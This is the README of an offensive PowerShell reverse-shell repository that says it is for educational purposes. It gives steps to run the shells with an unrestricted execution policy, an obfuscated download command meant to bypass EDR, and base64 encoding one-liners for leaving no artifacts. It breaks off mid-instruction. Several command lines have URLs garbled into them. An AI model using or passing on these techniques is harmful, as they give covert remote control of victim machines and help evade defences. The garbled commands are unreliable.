
powershell-reverse-tcp v5.0
PowerShell scripts for communicating with a remote host.
PowerShell Reverse TCP
PowerShell scripts for communicating with a remote host.
Remote host will have a full control over the client and all the underlying system commands.
Check shells based on:
Tested with PowerShell v5.1.19041.2673 on Windows 10 Enterprise OS (64-bit).
Made for educational purposes. I hope it will help!
This repository started to have known signatures and I don't have time to upload new scripts each time so you should obfuscate these scripts yourself.
Future plans:
- more shells based on process pipes, and optimize them further.
Table of Contents
How to Run
Change the IP address and port number inside the scripts as necessary.
Open the PowerShell from \src\invoke_expression\original\ or \src\process_pipes\original\ and run the commands shown below.
Set the execution policy:
Set-ExecutionPolicy Unrestricted
Run the script:
.\powershell_reverse_tcp.ps1
Or, run the following command from either PowerShell or Command Prompt:
PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1
Obfuscate PowerShell Scripts
Try to bypass EDR and other security mechanisms by obfuscating your scripts. You can see such obfuscations in the examples below.
Original PowerShell command:
(New-Object Net.WebClient).DownloadFile($url, $out)
Obfuscated PowerShell command:
& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'
Check the original PowerShell script here and the fully obfuscated one here.
After manual obfuscation, the original PowerShell script was obfuscated with Invoke-Obfuscation. Credits to the author!
Search the Internet for additional obfuscation techniques and methods.
P.S. Because PowerShell is constantly being updated, some regular expressions (e.g. *ke-E*) may start to throw exceptions due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.
PowerShell Encoded Command
To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:
[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))
To decode a PowerShell encoded command, run the following PowerShell command:
[Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))
Use the one-liners below if you don't want to leave any artifacts behind.
[Reverse TCP - Invoke-Expression] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt: